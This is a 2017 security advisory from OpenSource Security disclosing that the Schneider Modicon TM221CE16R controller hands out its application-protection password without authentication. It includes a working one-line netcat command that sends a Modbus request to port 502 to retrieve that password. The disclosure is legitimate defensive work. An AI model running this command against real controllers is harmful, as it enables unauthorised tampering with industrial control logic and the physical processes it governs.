OpenSource Security Ralf Spenneberg Am Bahnhof 3-5 48565 Steinfurt info@xxxxxxxx OS-S Security Advisory 2017-01 Date: April 4th, 2017 Authors: Simon Heming, Maik Brüggemann, Hendrik Schwartke, Ralf Spenneberg CVE: not yet assigned CVSS: 10 Affected Device: Schneider Modicon TM221CE16R, Firmware 1.3.3.3 Title: The password for the application protection of the Schneider Modicon TM221CE16R can be retrieved without authentication. Subsequently the application may be arbitrarily downloaded, uploaded and modified. Severity: Critical. The protection of the application is not existant. Ease of Exploitation: Trivial Vulnerability type: Information Disclosure Vendor contacted: December 23rd, 2016 Abstract The Application Protection is used to prevent the transfer of the application from a logic controller into a SoMachine Basic project. A simple command (seen below) can be send via Modbus over TCP port 502 to the logic controller and it will return the password unencrypted. // bash command echo -n -e '\x00\x01\x00\x00\x00\x05\x01\x5a\x00\x03\x00' | nc IP 502 After that the retrieved password can be entered in SoMachine Basic to download, modify and subsequently upload again any desired application. Vendor Contacted We contacted the vendor. Apart from the first acknowledgement of the receipt of the report we did not receive any further information. PDF: https://www.os-s.net/advisories/OSS-2017-01.pdf -- OpenSource Training Ralf Spenneberg http://www.os-t.de Am Bahnhof 3-5 48565 Steinfurt Germany Fon: +49(0)2552 638 755 Fax: +49(0)2552 638 757